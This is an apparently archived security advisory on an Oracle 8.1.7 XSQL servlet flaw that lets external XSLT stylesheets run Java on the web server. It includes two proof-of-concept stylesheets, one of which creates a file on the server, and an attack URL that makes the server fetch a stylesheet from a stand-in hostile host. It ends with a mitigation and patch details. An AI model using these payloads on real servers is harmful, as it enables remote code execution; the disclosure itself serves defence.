COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8.1.7 (others?)

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #34.
    Oracle XSQL servlet and xml-stylesheet allow executing java on the
    web server.

    This  affects  Oracle  XSQL  servlet,  installed by default Oracle
    8.1.7 Windows 2000installation, probably other  versions/platforms
    are affected because the servlet is written in java.

    To get an idea for the XSQL servlet it is suggested to read:

        http://technet.oracle.com/tech/xml/xsql_servlet/htdocs/relnotes.htm

    The XSQL servlet allows specifying external xslt stylesheets which
    may reside  anywhere.   The problem  is it  is possible to execute
    java on the web server in the xslt stylesheet.  Executing java  on
    the web server may lead to compromising it.

    Oracle allows extensions to the built in xslt functions using  the
    xmlns  "http://www.oracle.com/XSL/Transform/java/".   Using   this
    namespace it is possible  to instantiate java objects  and execute
    their methods.

    Sample xslt stylesheets:

    --ora.xsl---string function, almost no effect---------------
    <?xml version="1.0"?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
    <xsl:template match="/">
    <html>
    <h2>
    Written by <A HREF="http://www.guninski.com">Georgi Guninski</A>
    <BR>
    </BR>
    Java demo.
    <xsl:variable name="str1" select="jstr:new('java on the server')" />
    <xsl:value-of select="jstr:toUpperCase($str1)" />
    </h2>
    </html>
    </xsl:template>
    </xsl:stylesheet>

    --ora2.xsl----creates a file -------------------------------
    <?xml version="1.0"?>
    <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.io.File" version="1.0">
    <xsl:template match="/">
    <html>
    <h2>
    Written by <A HREF="http://www.guninski.com">Georgi Guninski</A>
    <BR>
    </BR>
    File "c:\winnt\georgigjava" created=
    <xsl:variable name="r1" select="jstr:new('c:\\winnt\\georgigjava')" />
    <xsl:value-of select="jstr:createNewFile($r1)" />
    </h2>
    </html>
    </xsl:template>
    </xsl:stylesheet>

    Assuming  that  http://XSQL-SERVER/EXISTING.xsql  exists  and   is
    configured (there are installed .xsql demos in  /xsql/java/demo/),
    the following URL:

        http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

    will  execute  java   from  http://HOSTILE/ora.xsl  (see   example
    stylesheets above) on XSQL-SERVER.

    This  work  on  default  Oracle  8.1.7  install, we only needed to
    adjust the database name in the servlet config file.

SOLUTION

    Add  'allow-client-style="no"'  on  the  document element of every
    xsql page.

    Oracle has corrected this vulnerability in the new release of XSQL
    Servlet as well as provided more secure behavior by default.   The
    new release of XSQL Servlet, Release 1.0.4.0, can be obtained from
    Oracle Technology Network, OTN,

        http://otn.oracle.com/tech/xml/xsql_servlet

    A patch will also be  available in the upcoming Oracle8i,  Release
    8.1.7.1, patch set and available for use with iAS Release 1.0.2.1.